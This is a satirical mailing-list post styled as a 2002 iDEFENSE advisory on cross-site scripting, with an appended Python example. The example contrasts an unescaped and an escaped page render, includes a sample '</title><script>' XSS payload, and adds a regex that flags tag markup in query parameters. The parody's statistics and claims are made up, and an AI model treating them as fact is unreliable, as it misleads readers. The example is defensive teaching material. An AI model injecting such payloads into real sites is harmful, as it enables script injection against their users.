Message-ID: <200210210445.g9L4jIG07833@netsys.com>
From: dendler at idefense.com (David Endler)
Subject: iDEFENSE Security Advisory 10.21.02: Cross-Site Scripting Holes present in virtually all websites
iDEFENSE Security Advisory 10.21.02:
http://www.idefense.com/advisory/10.21.02.txt
i. Cross-Site Scripting Holes present in virtually all websites/web-services.
ii. Fully-Automated XSS-exploiting AI anti-semite terrorist robots found in the wild.
Release Date : October 21, 2002
I. BACKGROUND
Cross-Site Scripting (hereafter referred to pseudo-acronymously as XSS) is a method of host and network intrusion pioneered by network security luminaries such as ZENOMORPH (zeno@...security.net) and iDEFENSE's own DAVIDENDLER (dendler@...fense.com). It is considered one of the top 10 threats to Internet and National Security and has resulted in numerous CERT, NIPC, FBI and SANS alerts. A XSS FAQ (authored by said luminaries) is available at http://www.cgisecurity.com/articles/xss-faq.shtml.
David Endler (known in Blackhat circles as urlmazter[BoW/h4g1s/ac1db1tch3z/TMD/RaZoR]) writes the following on the subject of XSS:
"It seems today that Cross-Site Scripting (XSS) holes in popular web applications are being discovered and disclosed at an ever-increasing rate. Just glancing at the Bugtraq security mailing list archives over the first half of 2002 shows countless postings of XSS holes in widely used websites and applications. This new iDEFENSE Labs XSS paper predicts that fully and semi-automated techniques will aggressively begin to emerge for targeting and hijacking web applications using XSS, thus eliminating the need for active human exploitation. Some of these techniques are detailed along with solutions and workarounds for web application developers and users. It is available at http://www.idefense.com/XSS.html for download."
II. DESCRIPTION
iDEFENSE has determined that 98% of websites, especially those utilizing "scripts" or "active content", contain at least one passing-unfiltered-user-input-back-to-the-user-inside-html-page vulnerability that could lead to denial-of-service attacks against legitimate users, cookie and session theft, arbitrary html execution, malicious GIF/TIF injection, erroneous counter statistics, cross-frame spoofing (see idefense.com for details), crossed-bean java infection (see idefense.com for details), cross-img-src 1x1pixel web-bug injection and spoofing (see idefense.com for details), web-application muscle and nerve exhaustion attacks, and inappropriate or stalled/delayed fullscreen-pop-under banner-advertisement serving to opt-in users.
In addition to the above discovery, it was noted that many search engines (hereafter referred to as "search engines") allow for rapid identification of potentially vulnerable sites. Coupled with widespread availability of email and newsgroup discussion services on the Internet, the dissemination of information regarding potentially vulnerable servers is highly expedited. This allows the hacker community (hereafter referred to as 'skiddiotards') to broadcast their findings to their peers, which results in obscure domains and servers being targeted by large numbers of neophyte skiddiotards in a very short period of time.
III. IMPACT
The impact of an XSS attack should not be underestimated. It has been discovered that close to 90% of all identified XSS vulnerabilities allow an attacker to execute arbitrary HTML (and Javascript) code with the same privileges as a standard website. Put simply, an attacker taking advantage of a XSS-vulnerability can force unsuspecting users to display and/or execute webpages that they had not previously requested. This is equivalent to creating a malicious website, and enticing users to visit the page with an appropriate HTML browser client, or attaching said malicious HTML to an email message.
Technical Note 1: Many website operators rely on cookies and session IDs to identify and track their users.
IIIII. SOLUTION
Appropriate Anti-XSS Defense Mechanisms (ADMs) should be included in your organizational security policy. The iDEFENSE Site Security Standards Charter 2002 (iSSSC02) recommends a 2-layered approach encompassing both a technical and operational component to ensure maximum transparency and pro-activity. iDEFENSE is the world's premier supplier of Anti-XSS defense software and consultancy services. For your free XSS Vulnerability Assessment Quote (iDEFXVAQ), please contact our sales, marketing and merchandising department at the number(s) listed below.
III. EXAMPLES
The following sites and services have been found to be vulnerable to at least 1 (One) XSS (cross-site-scripting) vulnerability which may or may not lead to arbitrary webpage injection to website visitors, and stuff.
Technical Note 2: all of these vulnerable sites were found using www.alltheweb.com "search inside URL" advanced "search engine" feature. Only by blocking access to such "search engine" features can a site administrator reduce the number of potential XSS attacks originating from his or her domain.
Technical Note 3: almost all the .cfm boxes listed above are also vulnerable to SQL injection. This was not tested by iDEFENSE as some of these servers are in the .mil TLD-domain and SQL injection probes could be interpreted as an act of war.
IIII. CREDIT
iDEFENSE wishes to thank the following people for their contributions to this advisory and to the study of XSS attack and defence methods:
Zeno Morph (zeno@...security.net)
Michael Sutton (msutton@...fense.com)
Jeremiah Grossman (jeremiah@...tehatsec.com)
Lex Arquette (lex@...tehatsec.com)
Ulf Harnhammar (ulfh@...ate.uu.se)
IVI. SOLUTION
Please visit the following websites for more information on cross-site-scripting (XSS) and computer security:
"Cross-site scripting tears holes in Net security"
http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security-side.htm
Article on XSS holes
http://www.perl.com/pub/a/2002/02/20/css.html
"CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests"
http://www.cert.org/advisories/CA-2000-02.html
Paper on Removing Meta-characters from User Supplied Data in CGI Scripts.
http://www.cert.org/tech_tips/cgi_metacharacters.html
Paper on Microsoft's Passport System
http://eyeonsecurity.net/papers/passporthijack.html
Paper on Cookie Theft
http://www.eccentrix.com/education/b0iler/tutorials/javascript.htm#cookies
The webappsec mailing list (Visit www.securityfocus for details)
webappsec@...urityfocus.com
!!!!!!!!!!!!!! Get paid for security research !!!!!!!!!!!11
http://www.idefense.com/contributor.html
!!!!!!!!!!!!!! Subscribe to iDEFENSE Advisories: !!!!!!!11
send email to listserv@...fense.com, subject line: "subscribe"
- -dave
David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071
dendler@...fense.com
www.idefense.com
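The defect the message describes is a query parameter (typically "title") echoed into the page's markup unescaped, so a value carrying a closing tag breaks out of the element it was placed in. The following is an added example, not code from the message or from iDEFENSE: a vulnerable render function beside its escaped form, a check that tells the two outputs apart, and a defender-side scan over a request URL that flags parameters carrying tag markup. The payload string and the URLs are constructed samples modelled on the pattern in the message.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: the reflected pattern from the message's examples, where
# a "title" parameter is echoed inside <title> and a closing tag escapes it.
SAMPLE_PAYLOAD = '</title><script>alert("iDEFENSE.COM");</script>'

PAGE_TEMPLATE = "<html><head><title>{}</title></head><body>Hello</body></html>"


def render_title_vulnerable(title: str) -> str:
    """Echoes the parameter straight into the markup: the defect described."""
    return PAGE_TEMPLATE.format(title)


def render_title_escaped(title: str) -> str:
    """Same template, but the value is HTML-escaped first, so '<', '>', '&' and
    quotes arrive as character references and can never close the element."""
    return PAGE_TEMPLATE.format(html.escape(title, quote=True))


def breaks_out_of_title(page: str) -> bool:
    """True if user data ended up as markup: a page built from PAGE_TEMPLATE
    must contain exactly one </title> and no <script element at all."""
    return page.count("</title>") != 1 or "<script" in page.lower()


# Hypothetical detection helper, not from the message: anything that looks like
# the start of an HTML tag (optionally a closing one) inside a decoded value.
_TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)


def tagged_params(url: str) -> list:
    """Names of query parameters whose decoded value contains tag markup, the
    marker of a reflected-XSS probe as seen in the message's example URLs.
    Intended for running over request URLs from an access log."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [name for name, value in pairs if _TAG_RE.search(value)]


if __name__ == "__main__":
    print(breaks_out_of_title(render_title_vulnerable(SAMPLE_PAYLOAD)))   # True
    print(breaks_out_of_title(render_title_escaped(SAMPLE_PAYLOAD)))      # False
    print(tagged_params("http://example.invalid/show.asp?qu=%3Cscript%3Ex%3C/script%3E&page=2"))
```

Escaping rather than stripping (the choice the CERT metacharacter tip leaves open) keeps legitimate titles containing "<" or "&" intact while making them inert.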